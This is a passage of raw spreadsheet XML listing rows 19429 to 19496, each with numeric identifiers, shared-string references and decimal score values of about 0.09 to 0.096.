        <v>15755</v>
      </c>
      <c r="F19429" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19430" ht="15.75" customHeight="1">
      <c r="A19430" s="1">
        <v>28160.0</v>
      </c>
      <c r="B19430" s="2">
        <v>2.4899338E7</v>
      </c>
      <c r="C19430" s="2" t="s">
        <v>18726</v>
      </c>
      <c r="D19430" s="2">
        <v>1.0</v>
      </c>
      <c r="E19430" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19430" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19431" ht="15.75" customHeight="1">
      <c r="A19431" s="1">
        <v>28243.0</v>
      </c>
      <c r="B19431" s="2">
        <v>2.5226602E7</v>
      </c>
      <c r="C19431" s="2" t="s">
        <v>18727</v>
      </c>
      <c r="D19431" s="2">
        <v>1.0</v>
      </c>
      <c r="E19431" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19431" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19432" ht="15.75" customHeight="1">
      <c r="A19432" s="1">
        <v>28609.0</v>
      </c>
      <c r="B19432" s="2">
        <v>2.7105135E7</v>
      </c>
      <c r="C19432" s="2" t="s">
        <v>18728</v>
      </c>
      <c r="D19432" s="2">
        <v>1.0</v>
      </c>
      <c r="E19432" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19432" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19433" ht="15.75" customHeight="1">
      <c r="A19433" s="1">
        <v>29015.0</v>
      </c>
      <c r="B19433" s="2">
        <v>3.0058675E7</v>
      </c>
      <c r="C19433" s="2" t="s">
        <v>18729</v>
      </c>
      <c r="D19433" s="2">
        <v>1.0</v>
      </c>
      <c r="E19433" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19433" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19434" ht="15.75" customHeight="1">
      <c r="A19434" s="1">
        <v>29159.0</v>
      </c>
      <c r="B19434" s="2">
        <v>3.0618919E7</v>
      </c>
      <c r="C19434" s="2" t="s">
        <v>18730</v>
      </c>
      <c r="D19434" s="2">
        <v>1.0</v>
      </c>
      <c r="E19434" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19434" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19435" ht="15.75" customHeight="1">
      <c r="A19435" s="1">
        <v>29242.0</v>
      </c>
      <c r="B19435" s="2">
        <v>3.0844182E7</v>
      </c>
      <c r="C19435" s="2" t="s">
        <v>18731</v>
      </c>
      <c r="D19435" s="2">
        <v>1.0</v>
      </c>
      <c r="E19435" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19435" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19436" ht="15.75" customHeight="1">
      <c r="A19436" s="1">
        <v>29395.0</v>
      </c>
      <c r="B19436" s="2">
        <v>3.1932651E7</v>
      </c>
      <c r="C19436" s="2" t="s">
        <v>18732</v>
      </c>
      <c r="D19436" s="2">
        <v>1.0</v>
      </c>
      <c r="E19436" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19436" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19437" ht="15.75" customHeight="1">
      <c r="A19437" s="1">
        <v>30233.0</v>
      </c>
      <c r="B19437" s="2">
        <v>3.7445817E7</v>
      </c>
      <c r="C19437" s="2" t="s">
        <v>18733</v>
      </c>
      <c r="D19437" s="2">
        <v>1.0</v>
      </c>
      <c r="E19437" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19437" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19438" ht="15.75" customHeight="1">
      <c r="A19438" s="1">
        <v>30263.0</v>
      </c>
      <c r="B19438" s="2">
        <v>3.7634219E7</v>
      </c>
      <c r="C19438" s="2" t="s">
        <v>18708</v>
      </c>
      <c r="D19438" s="2">
        <v>1.0</v>
      </c>
      <c r="E19438" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19438" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19439" ht="15.75" customHeight="1">
      <c r="A19439" s="1">
        <v>30813.0</v>
      </c>
      <c r="B19439" s="2">
        <v>4.5288882E7</v>
      </c>
      <c r="C19439" s="2" t="s">
        <v>18734</v>
      </c>
      <c r="D19439" s="2">
        <v>1.0</v>
      </c>
      <c r="E19439" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19439" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19440" ht="15.75" customHeight="1">
      <c r="A19440" s="1">
        <v>31346.0</v>
      </c>
      <c r="B19440" s="2">
        <v>4983515.0</v>
      </c>
      <c r="C19440" s="2" t="s">
        <v>18735</v>
      </c>
      <c r="D19440" s="2">
        <v>1.0</v>
      </c>
      <c r="E19440" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19440" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19441" ht="15.75" customHeight="1">
      <c r="A19441" s="1">
        <v>31434.0</v>
      </c>
      <c r="B19441" s="2">
        <v>5.0158111E7</v>
      </c>
      <c r="C19441" s="2" t="s">
        <v>18736</v>
      </c>
      <c r="D19441" s="2">
        <v>1.0</v>
      </c>
      <c r="E19441" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19441" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19442" ht="15.75" customHeight="1">
      <c r="A19442" s="1">
        <v>31585.0</v>
      </c>
      <c r="B19442" s="2">
        <v>5128684.0</v>
      </c>
      <c r="C19442" s="2" t="s">
        <v>18737</v>
      </c>
      <c r="D19442" s="2">
        <v>1.0</v>
      </c>
      <c r="E19442" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19442" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19443" ht="15.75" customHeight="1">
      <c r="A19443" s="1">
        <v>31687.0</v>
      </c>
      <c r="B19443" s="2">
        <v>5.1916318E7</v>
      </c>
      <c r="C19443" s="2" t="s">
        <v>18738</v>
      </c>
      <c r="D19443" s="2">
        <v>1.0</v>
      </c>
      <c r="E19443" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19443" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19444" ht="15.75" customHeight="1">
      <c r="A19444" s="1">
        <v>31917.0</v>
      </c>
      <c r="B19444" s="2">
        <v>5.3029446E7</v>
      </c>
      <c r="C19444" s="2" t="s">
        <v>18739</v>
      </c>
      <c r="D19444" s="2">
        <v>1.0</v>
      </c>
      <c r="E19444" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19444" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19445" ht="15.75" customHeight="1">
      <c r="A19445" s="1">
        <v>32285.0</v>
      </c>
      <c r="B19445" s="2">
        <v>5536232.0</v>
      </c>
      <c r="C19445" s="2" t="s">
        <v>18740</v>
      </c>
      <c r="D19445" s="2">
        <v>1.0</v>
      </c>
      <c r="E19445" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19445" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19446" ht="15.75" customHeight="1">
      <c r="A19446" s="1">
        <v>32346.0</v>
      </c>
      <c r="B19446" s="2">
        <v>5591840.0</v>
      </c>
      <c r="C19446" s="2" t="s">
        <v>18741</v>
      </c>
      <c r="D19446" s="2">
        <v>1.0</v>
      </c>
      <c r="E19446" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19446" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19447" ht="15.75" customHeight="1">
      <c r="A19447" s="1">
        <v>32696.0</v>
      </c>
      <c r="B19447" s="2">
        <v>5953814.0</v>
      </c>
      <c r="C19447" s="2" t="s">
        <v>18742</v>
      </c>
      <c r="D19447" s="2">
        <v>1.0</v>
      </c>
      <c r="E19447" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19447" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19448" ht="15.75" customHeight="1">
      <c r="A19448" s="1">
        <v>32864.0</v>
      </c>
      <c r="B19448" s="2">
        <v>6293088.0</v>
      </c>
      <c r="C19448" s="2" t="s">
        <v>18743</v>
      </c>
      <c r="D19448" s="2">
        <v>1.0</v>
      </c>
      <c r="E19448" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19448" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19449" ht="15.75" customHeight="1">
      <c r="A19449" s="1">
        <v>33053.0</v>
      </c>
      <c r="B19449" s="2">
        <v>6792516.0</v>
      </c>
      <c r="C19449" s="2" t="s">
        <v>18744</v>
      </c>
      <c r="D19449" s="2">
        <v>1.0</v>
      </c>
      <c r="E19449" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19449" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19450" ht="15.75" customHeight="1">
      <c r="A19450" s="1">
        <v>33399.0</v>
      </c>
      <c r="B19450" s="2">
        <v>7704005.0</v>
      </c>
      <c r="C19450" s="2" t="s">
        <v>18745</v>
      </c>
      <c r="D19450" s="2">
        <v>1.0</v>
      </c>
      <c r="E19450" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19450" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19451" ht="15.75" customHeight="1">
      <c r="A19451" s="1">
        <v>33849.0</v>
      </c>
      <c r="B19451" s="2">
        <v>9028095.0</v>
      </c>
      <c r="C19451" s="2" t="s">
        <v>18746</v>
      </c>
      <c r="D19451" s="2">
        <v>1.0</v>
      </c>
      <c r="E19451" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19451" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19452" ht="15.75" customHeight="1">
      <c r="A19452" s="1">
        <v>34207.0</v>
      </c>
      <c r="B19452" s="2">
        <v>2.1764746E7</v>
      </c>
      <c r="C19452" s="2" t="s">
        <v>18747</v>
      </c>
      <c r="D19452" s="2">
        <v>1.0</v>
      </c>
      <c r="E19452" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19452" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19453" ht="15.75" customHeight="1">
      <c r="A19453" s="1">
        <v>1766.0</v>
      </c>
      <c r="B19453" s="2">
        <v>2.8976036E7</v>
      </c>
      <c r="C19453" s="2" t="s">
        <v>18748</v>
      </c>
      <c r="D19453" s="2">
        <v>1.0</v>
      </c>
      <c r="E19453" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19453" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="19454" ht="15.75" customHeight="1">
      <c r="A19454" s="1">
        <v>3183.0</v>
      </c>
      <c r="B19454" s="2">
        <v>3.7113612E7</v>
      </c>
      <c r="C19454" s="2" t="s">
        <v>18749</v>
      </c>
      <c r="D19454" s="2">
        <v>1.0</v>
      </c>
      <c r="E19454" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19454" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="19455" ht="15.75" customHeight="1">
      <c r="A19455" s="1">
        <v>4065.0</v>
      </c>
      <c r="B19455" s="2">
        <v>4.1157627E7</v>
      </c>
      <c r="C19455" s="2" t="s">
        <v>18750</v>
      </c>
      <c r="D19455" s="2">
        <v>1.0</v>
      </c>
      <c r="E19455" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19455" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="19456" ht="15.75" customHeight="1">
      <c r="A19456" s="1">
        <v>12292.0</v>
      </c>
      <c r="B19456" s="2">
        <v>2.8263243E7</v>
      </c>
      <c r="C19456" s="2" t="s">
        <v>18751</v>
      </c>
      <c r="D19456" s="2">
        <v>1.0</v>
      </c>
      <c r="E19456" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19456" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="19457" ht="15.75" customHeight="1">
      <c r="A19457" s="1">
        <v>14557.0</v>
      </c>
      <c r="B19457" s="2">
        <v>4.001192E7</v>
      </c>
      <c r="C19457" s="2" t="s">
        <v>18752</v>
      </c>
      <c r="D19457" s="2">
        <v>1.0</v>
      </c>
      <c r="E19457" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19457" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="19458" ht="15.75" customHeight="1">
      <c r="A19458" s="1">
        <v>20615.0</v>
      </c>
      <c r="B19458" s="2">
        <v>1.3987339E7</v>
      </c>
      <c r="C19458" s="2" t="s">
        <v>18753</v>
      </c>
      <c r="D19458" s="2">
        <v>1.0</v>
      </c>
      <c r="E19458" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19458" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="19459" ht="15.75" customHeight="1">
      <c r="A19459" s="1">
        <v>24137.0</v>
      </c>
      <c r="B19459" s="2">
        <v>1.004768E7</v>
      </c>
      <c r="C19459" s="2" t="s">
        <v>18754</v>
      </c>
      <c r="D19459" s="2">
        <v>1.0</v>
      </c>
      <c r="E19459" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19459" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="19460" ht="15.75" customHeight="1">
      <c r="A19460" s="1">
        <v>25692.0</v>
      </c>
      <c r="B19460" s="2">
        <v>1.4528518E7</v>
      </c>
      <c r="C19460" s="2" t="s">
        <v>18755</v>
      </c>
      <c r="D19460" s="2">
        <v>1.0</v>
      </c>
      <c r="E19460" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19460" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="19461" ht="15.75" customHeight="1">
      <c r="A19461" s="1">
        <v>30319.0</v>
      </c>
      <c r="B19461" s="2">
        <v>3.8037294E7</v>
      </c>
      <c r="C19461" s="2" t="s">
        <v>18756</v>
      </c>
      <c r="D19461" s="2">
        <v>1.0</v>
      </c>
      <c r="E19461" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19461" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="19462" ht="15.75" customHeight="1">
      <c r="A19462" s="1">
        <v>30612.0</v>
      </c>
      <c r="B19462" s="2">
        <v>4.1359793E7</v>
      </c>
      <c r="C19462" s="2" t="s">
        <v>18757</v>
      </c>
      <c r="D19462" s="2">
        <v>1.0</v>
      </c>
      <c r="E19462" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19462" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="19463" ht="15.75" customHeight="1">
      <c r="A19463" s="1">
        <v>26289.0</v>
      </c>
      <c r="B19463" s="2">
        <v>1.6464152E7</v>
      </c>
      <c r="C19463" s="2" t="s">
        <v>18758</v>
      </c>
      <c r="D19463" s="2">
        <v>1.0</v>
      </c>
      <c r="E19463" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19463" s="2">
        <v>0.09538784067085955</v>
      </c>
    </row>
    <row r="19464" ht="15.75" customHeight="1">
      <c r="A19464" s="1">
        <v>11666.0</v>
      </c>
      <c r="B19464" s="2">
        <v>2.3371146E7</v>
      </c>
      <c r="C19464" s="2" t="s">
        <v>18759</v>
      </c>
      <c r="D19464" s="2">
        <v>1.0</v>
      </c>
      <c r="E19464" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19464" s="2">
        <v>0.09537037037037034</v>
      </c>
    </row>
    <row r="19465" ht="15.75" customHeight="1">
      <c r="A19465" s="1">
        <v>32248.0</v>
      </c>
      <c r="B19465" s="2">
        <v>5.5077632E7</v>
      </c>
      <c r="C19465" s="2" t="s">
        <v>18760</v>
      </c>
      <c r="D19465" s="2">
        <v>1.0</v>
      </c>
      <c r="E19465" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19465" s="2">
        <v>0.0951035781544256</v>
      </c>
    </row>
    <row r="19466" ht="15.75" customHeight="1">
      <c r="A19466" s="1">
        <v>30559.0</v>
      </c>
      <c r="B19466" s="2">
        <v>4.0772431E7</v>
      </c>
      <c r="C19466" s="2" t="s">
        <v>18761</v>
      </c>
      <c r="D19466" s="2">
        <v>1.0</v>
      </c>
      <c r="E19466" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19466" s="2">
        <v>0.09482758620689655</v>
      </c>
    </row>
    <row r="19467" ht="15.75" customHeight="1">
      <c r="A19467" s="1">
        <v>8442.0</v>
      </c>
      <c r="B19467" s="2">
        <v>5.3958839E7</v>
      </c>
      <c r="C19467" s="2" t="s">
        <v>18762</v>
      </c>
      <c r="D19467" s="2">
        <v>1.0</v>
      </c>
      <c r="E19467" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19467" s="2">
        <v>0.09477124183006533</v>
      </c>
    </row>
    <row r="19468" ht="15.75" customHeight="1">
      <c r="A19468" s="1">
        <v>10111.0</v>
      </c>
      <c r="B19468" s="2">
        <v>5.7243449E7</v>
      </c>
      <c r="C19468" s="2" t="s">
        <v>18763</v>
      </c>
      <c r="D19468" s="2">
        <v>1.0</v>
      </c>
      <c r="E19468" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19468" s="2">
        <v>0.09477124183006533</v>
      </c>
    </row>
    <row r="19469" ht="15.75" customHeight="1">
      <c r="A19469" s="1">
        <v>28719.0</v>
      </c>
      <c r="B19469" s="2">
        <v>2.7908081E7</v>
      </c>
      <c r="C19469" s="2" t="s">
        <v>4875</v>
      </c>
      <c r="D19469" s="2">
        <v>1.0</v>
      </c>
      <c r="E19469" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19469" s="2">
        <v>0.09477124183006533</v>
      </c>
    </row>
    <row r="19470" ht="15.75" customHeight="1">
      <c r="A19470" s="1">
        <v>22644.0</v>
      </c>
      <c r="B19470" s="2">
        <v>4.0772432E7</v>
      </c>
      <c r="C19470" s="2" t="s">
        <v>18764</v>
      </c>
      <c r="D19470" s="2">
        <v>1.0</v>
      </c>
      <c r="E19470" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19470" s="2">
        <v>0.09454191033138402</v>
      </c>
    </row>
    <row r="19471" ht="15.75" customHeight="1">
      <c r="A19471" s="1">
        <v>11099.0</v>
      </c>
      <c r="B19471" s="2">
        <v>1.8579717E7</v>
      </c>
      <c r="C19471" s="2" t="s">
        <v>18765</v>
      </c>
      <c r="D19471" s="2">
        <v>1.0</v>
      </c>
      <c r="E19471" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19471" s="2">
        <v>0.09424603174603176</v>
      </c>
    </row>
    <row r="19472" ht="15.75" customHeight="1">
      <c r="A19472" s="1">
        <v>15410.0</v>
      </c>
      <c r="B19472" s="2">
        <v>4.285575E7</v>
      </c>
      <c r="C19472" s="2" t="s">
        <v>18766</v>
      </c>
      <c r="D19472" s="2">
        <v>1.0</v>
      </c>
      <c r="E19472" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19472" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="19473" ht="15.75" customHeight="1">
      <c r="A19473" s="1">
        <v>33873.0</v>
      </c>
      <c r="B19473" s="2">
        <v>9110522.0</v>
      </c>
      <c r="C19473" s="2" t="s">
        <v>18767</v>
      </c>
      <c r="D19473" s="2">
        <v>1.0</v>
      </c>
      <c r="E19473" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19473" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="19474" ht="15.75" customHeight="1">
      <c r="A19474" s="1">
        <v>5002.0</v>
      </c>
      <c r="B19474" s="2">
        <v>4.4177805E7</v>
      </c>
      <c r="C19474" s="2" t="s">
        <v>18768</v>
      </c>
      <c r="D19474" s="2">
        <v>1.0</v>
      </c>
      <c r="E19474" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19474" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="19475" ht="15.75" customHeight="1">
      <c r="A19475" s="1">
        <v>11610.0</v>
      </c>
      <c r="B19475" s="2">
        <v>2.3039864E7</v>
      </c>
      <c r="C19475" s="2" t="s">
        <v>18769</v>
      </c>
      <c r="D19475" s="2">
        <v>1.0</v>
      </c>
      <c r="E19475" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19475" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="19476" ht="15.75" customHeight="1">
      <c r="A19476" s="1">
        <v>12564.0</v>
      </c>
      <c r="B19476" s="2">
        <v>2.9939308E7</v>
      </c>
      <c r="C19476" s="2" t="s">
        <v>18770</v>
      </c>
      <c r="D19476" s="2">
        <v>1.0</v>
      </c>
      <c r="E19476" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19476" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="19477" ht="15.75" customHeight="1">
      <c r="A19477" s="1">
        <v>297.0</v>
      </c>
      <c r="B19477" s="2">
        <v>1.5508655E7</v>
      </c>
      <c r="C19477" s="2" t="s">
        <v>18771</v>
      </c>
      <c r="D19477" s="2">
        <v>1.0</v>
      </c>
      <c r="E19477" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19477" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19478" ht="15.75" customHeight="1">
      <c r="A19478" s="1">
        <v>1369.0</v>
      </c>
      <c r="B19478" s="2">
        <v>2.6013319E7</v>
      </c>
      <c r="C19478" s="2" t="s">
        <v>18772</v>
      </c>
      <c r="D19478" s="2">
        <v>1.0</v>
      </c>
      <c r="E19478" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19478" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19479" ht="15.75" customHeight="1">
      <c r="A19479" s="1">
        <v>1689.0</v>
      </c>
      <c r="B19479" s="2">
        <v>2.8448787E7</v>
      </c>
      <c r="C19479" s="2" t="s">
        <v>18773</v>
      </c>
      <c r="D19479" s="2">
        <v>1.0</v>
      </c>
      <c r="E19479" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19479" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19480" ht="15.75" customHeight="1">
      <c r="A19480" s="1">
        <v>1915.0</v>
      </c>
      <c r="B19480" s="2">
        <v>3.0035885E7</v>
      </c>
      <c r="C19480" s="2" t="s">
        <v>18774</v>
      </c>
      <c r="D19480" s="2">
        <v>1.0</v>
      </c>
      <c r="E19480" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19480" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19481" ht="15.75" customHeight="1">
      <c r="A19481" s="1">
        <v>8034.0</v>
      </c>
      <c r="B19481" s="2">
        <v>5.2827628E7</v>
      </c>
      <c r="C19481" s="2" t="s">
        <v>18775</v>
      </c>
      <c r="D19481" s="2">
        <v>1.0</v>
      </c>
      <c r="E19481" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19481" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19482" ht="15.75" customHeight="1">
      <c r="A19482" s="1">
        <v>10370.0</v>
      </c>
      <c r="B19482" s="2">
        <v>7946244.0</v>
      </c>
      <c r="C19482" s="2" t="s">
        <v>18776</v>
      </c>
      <c r="D19482" s="2">
        <v>1.0</v>
      </c>
      <c r="E19482" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19482" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19483" ht="15.75" customHeight="1">
      <c r="A19483" s="1">
        <v>11533.0</v>
      </c>
      <c r="B19483" s="2">
        <v>2.2566395E7</v>
      </c>
      <c r="C19483" s="2" t="s">
        <v>18777</v>
      </c>
      <c r="D19483" s="2">
        <v>1.0</v>
      </c>
      <c r="E19483" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19483" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19484" ht="15.75" customHeight="1">
      <c r="A19484" s="1">
        <v>12548.0</v>
      </c>
      <c r="B19484" s="2">
        <v>2.9869406E7</v>
      </c>
      <c r="C19484" s="2" t="s">
        <v>18778</v>
      </c>
      <c r="D19484" s="2">
        <v>1.0</v>
      </c>
      <c r="E19484" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19484" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19485" ht="15.75" customHeight="1">
      <c r="A19485" s="1">
        <v>12994.0</v>
      </c>
      <c r="B19485" s="2">
        <v>3.2772026E7</v>
      </c>
      <c r="C19485" s="2" t="s">
        <v>18779</v>
      </c>
      <c r="D19485" s="2">
        <v>1.0</v>
      </c>
      <c r="E19485" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19485" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19486" ht="15.75" customHeight="1">
      <c r="A19486" s="1">
        <v>13170.0</v>
      </c>
      <c r="B19486" s="2">
        <v>3.3981013E7</v>
      </c>
      <c r="C19486" s="2" t="s">
        <v>18780</v>
      </c>
      <c r="D19486" s="2">
        <v>1.0</v>
      </c>
      <c r="E19486" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19486" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19487" ht="15.75" customHeight="1">
      <c r="A19487" s="1">
        <v>13868.0</v>
      </c>
      <c r="B19487" s="2">
        <v>3.6952639E7</v>
      </c>
      <c r="C19487" s="2" t="s">
        <v>18781</v>
      </c>
      <c r="D19487" s="2">
        <v>1.0</v>
      </c>
      <c r="E19487" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19487" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19488" ht="15.75" customHeight="1">
      <c r="A19488" s="1">
        <v>14591.0</v>
      </c>
      <c r="B19488" s="2">
        <v>4.0178618E7</v>
      </c>
      <c r="C19488" s="2" t="s">
        <v>18782</v>
      </c>
      <c r="D19488" s="2">
        <v>1.0</v>
      </c>
      <c r="E19488" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19488" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19489" ht="15.75" customHeight="1">
      <c r="A19489" s="1">
        <v>14909.0</v>
      </c>
      <c r="B19489" s="2">
        <v>4.118764E7</v>
      </c>
      <c r="C19489" s="2" t="s">
        <v>18783</v>
      </c>
      <c r="D19489" s="2">
        <v>1.0</v>
      </c>
      <c r="E19489" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19489" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19490" ht="15.75" customHeight="1">
      <c r="A19490" s="1">
        <v>15300.0</v>
      </c>
      <c r="B19490" s="2">
        <v>4.2460266E7</v>
      </c>
      <c r="C19490" s="2" t="s">
        <v>18784</v>
      </c>
      <c r="D19490" s="2">
        <v>1.0</v>
      </c>
      <c r="E19490" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19490" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19491" ht="15.75" customHeight="1">
      <c r="A19491" s="1">
        <v>15567.0</v>
      </c>
      <c r="B19491" s="2">
        <v>4.3430923E7</v>
      </c>
      <c r="C19491" s="2" t="s">
        <v>18785</v>
      </c>
      <c r="D19491" s="2">
        <v>1.0</v>
      </c>
      <c r="E19491" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19491" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19492" ht="15.75" customHeight="1">
      <c r="A19492" s="1">
        <v>16039.0</v>
      </c>
      <c r="B19492" s="2">
        <v>4.5130068E7</v>
      </c>
      <c r="C19492" s="2" t="s">
        <v>18786</v>
      </c>
      <c r="D19492" s="2">
        <v>1.0</v>
      </c>
      <c r="E19492" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19492" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19493" ht="15.75" customHeight="1">
      <c r="A19493" s="1">
        <v>17067.0</v>
      </c>
      <c r="B19493" s="2">
        <v>4.85797E7</v>
      </c>
      <c r="C19493" s="2" t="s">
        <v>18787</v>
      </c>
      <c r="D19493" s="2">
        <v>1.0</v>
      </c>
      <c r="E19493" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19493" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19494" ht="15.75" customHeight="1">
      <c r="A19494" s="1">
        <v>17490.0</v>
      </c>
      <c r="B19494" s="2">
        <v>4.9953223E7</v>
      </c>
      <c r="C19494" s="2" t="s">
        <v>18788</v>
      </c>
      <c r="D19494" s="2">
        <v>1.0</v>
      </c>
      <c r="E19494" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19494" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19495" ht="15.75" customHeight="1">
      <c r="A19495" s="1">
        <v>17578.0</v>
      </c>
      <c r="B19495" s="2">
        <v>5.0266539E7</v>
      </c>
      <c r="C19495" s="2" t="s">
        <v>18789</v>
      </c>
      <c r="D19495" s="2">
        <v>1.0</v>
      </c>
      <c r="E19495" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19495" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19496" ht="15.75" customHeight="1">
      <c r="A19496" s="1">
        <v>18488.0</v>
      </c>
      <c r="B19496" s="2">
        <v>5.2899273E7</v>
      </c>
      <c r="C19496" s="2" t="s">
        <v>18790</v>
      </c>
      <c r="D19496" s="2">
        <v>1.0</v>
      </c>
      <c r="E19496" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19496" s="2">
